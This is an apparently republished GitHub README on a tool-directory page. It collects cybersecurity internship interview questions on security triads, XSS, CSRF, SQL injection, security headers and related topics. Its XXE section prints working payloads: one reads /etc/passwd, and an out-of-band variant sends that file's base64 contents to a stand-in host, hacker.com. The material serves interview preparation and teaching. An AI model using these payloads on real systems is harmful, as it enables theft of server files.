Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Interview_Tips — Summary of Cyber Security interview questions I have been through, hope this helps | Kitploit
Tools/GitHubGitHub/jigerjain/interview_tips
Web SecurityNetwork SecurityCryptographyCloud SecurityLearning & EducationCurated ResourcesLearning Paths & CoursesBinary Exploitation
GitHubjigerjain/interview_tips

Interview_Tips

Summary of Cyber Security interview questions I have been through, hope this helps

View Repository
6917216 years agoReviewed by Kitploit

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Interview Tips (Information Security)

This page is a summary of interviews I have been through, covered a decent breadth of roles, got multiple rejects however, learned from each interview, collected constructive feedbacks and went ahead. Hope these questions/ tips could help you.

Roles which it generally covers are as follows:

  • Cybersecurity Intern
  • Penetration Testing Intern/ Red Team
  • Web App/ Application Security Intern
  • Product Security Intern
  • Infrastructure Security Intern

Quick tip:

  • Review your resume and ask questions related to it to yourself beforehand
  • If you are not aware of any question/concept, don't run around the topic, convey that you could learn it given an environment to work on
    You cannot know everything, be humble to accept if you answered something wrong or in need for clarification
  • Prepare a short bio about yourself beforehand to introduce yourself
  • Be sure about your end goal and why infosec?
  • Lastly, do ask about feedback at the end of the interview, why, because: it helps in knowing and filling the gaps of your current knowledge in infosec

I have tried to jot down all the possible question below which I came across and provided answers for few. Rest you could google for their specific answers and if you want to dive deep. Apart from that, there are few references in the end do have a look. Those were really helpful.

Would love to add more question as I move ahead and check my notes, however would appreciate if you could give me a constructive feedback about this by contacting me via [email protected]. If you came across something, which is not covered out here please feel free to share.

Common questions

  1. Security Triads:

What is CIA?

  • Confidentiality
  • Integrity
  • Availability

What is AAA?

  • Authentication
  • Authorization
  • Accounting
  1. Difference between Threat, Vulnerability, Exploits and Risk and how those are related to Assets
  • Threat:
    A threat is what we’re trying to protect against
  • Vulerability:
    A vulnerability is a weakness or gap in our protection efforts
  • Exploit:
    An ability/program (may be a software or social engineering skill) that has been developed to attack an asset by taking advantage of a vulnerability
  • Risk:
    Risk is the intersection of assets, threats, and vulnerabilities
  • Asset:
    An asset is what we’re trying to protect
  1. What is IAM and why it is been used?
    IAM is Identity Access Management which used to segreagate roles and responsibilities within an organization. It is a critical piece in security. It help in maintaining Access level security and privileges

Security in general

Phases of Network Intrusion Attack:

  • Reconnaissance/ Information Gathering
  • Gaining the needed access
  • Maintaining the access
  • Covering the tracks (Deleting logs, backdoors and hiding all controls)

Web Application Security

  1. Common Question:
  • OWASP Top 10

  • What is XSS (Cross-site Scripting)

    • Practice XSS at: [https://xss-game.appspot.com/]
    • How to combat XSS: Briefly use appropriate input validation
    • Look for CSP (Content-Security-Policy) Header
    • Different types of XSS: Reflected, Stored and DOM-based
    • What are sources and sinks in DOM which could lead to XSS:
      [https://www.netsparker.com/blog/web-security/dom-based-cross-site-scripting-vulnerability/]
  • What is CSRF This is the sweetest question which every other interviewer would love to ask
    Quick Tip: Be brief, if asked then only explain the whole story

    Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated. CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request. With a little help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state changing requests like transferring funds, changing their email address, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application.

  • How to combat CSRF:
    Use Anti-CSRF Tokens
    Use same-origin policy
    Usage of Referrer header

  • What is HTML/ URL Encoding

  • Is HTTP protocol stateless?
    HTTP is inherently stateless protocol however server uses cookies to make it stateful

  • What are types of Injections: SQL, Command, OS

  • How to combat SQL injections
    Use paramterized queries and stored procedures

  1. Check for headers which helps in providing security (Check the Urls and go throught the content, it would help in building your fundamentals):
  • CSP (Content-Security Policy) [https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy]
    [https://www.html5rocks.com/en/tutorials/security/content-security-policy/]
  • CORS (Cross-Origin Resource Sharing) [https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS]
  • Same-Origin policy [https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy]
  1. There would be rare scenarios when an interviewer would ask these, I came across the followings in later stages of few interviews, thought of mentioning:
  • What is XXE (XML External Entities)?
    XML external entity injection (also known as XXE) is a web security vulnerability that allows an attacker to interfere with an application's processing of XML data. It often allows an attacker to view files on the application server filesystem, and to interact with any backend or external systems that the application itself can access.
    Check this out [https://portswigger.net/web-security/xxe]
    E.g:
    <?xml version="1.0" encoding="UTF-8"?>    
    <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>     
    <stockCheck><productId>&xxe;</productId></stockCheck> 
    
    In some situations, an attacker can escalate an XXE attack to compromise the underlying server or other backend infrastructure, by leveraging the XXE vulnerability to perform server-side request forgery (SSRF) attacks.
  • Out-Of-Band - using XML entities, data from server can be grabbed and sent to hacker.com (NO server output required)

To be injected: document.xml

<!DOCTYPE root [
    <!ENTITY % remote SYSTEM "http://hacker.com/evil.dtd">
    %remote; %intern; %xxe;
]>
<root>&xxe;</root> - you can change xxe entity to general entity

External host: http://hacker.com/evil.dtd

<!ENTITY % payl SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/passwd">
<!ENTITY % intern "<!ENTITY &#37; xxe SYSTEM 'http://hacker.com/result-is?%payl;'>">
                    --- OR ---
<!ENTITY % intern "<!ENTITY &#37; xxe SYSTEM 'file://%payl;'>"> - consider error-based

Ref: [https://phonexicum.github.io/infosec/xxe.html]

  • What is SSRF (Server Side Request forgery) attack Could be used to pivot into the internal network
  • How to secure 3-tier web architecture
  • What is Kerberos https://www.varonis.com/blog/kerberos-authentication-explained/
  • What is Secret Management and Vaults https://www.hashicorp.com/resources/introduction-vault-whiteboard-armon-dadgar
Download Tool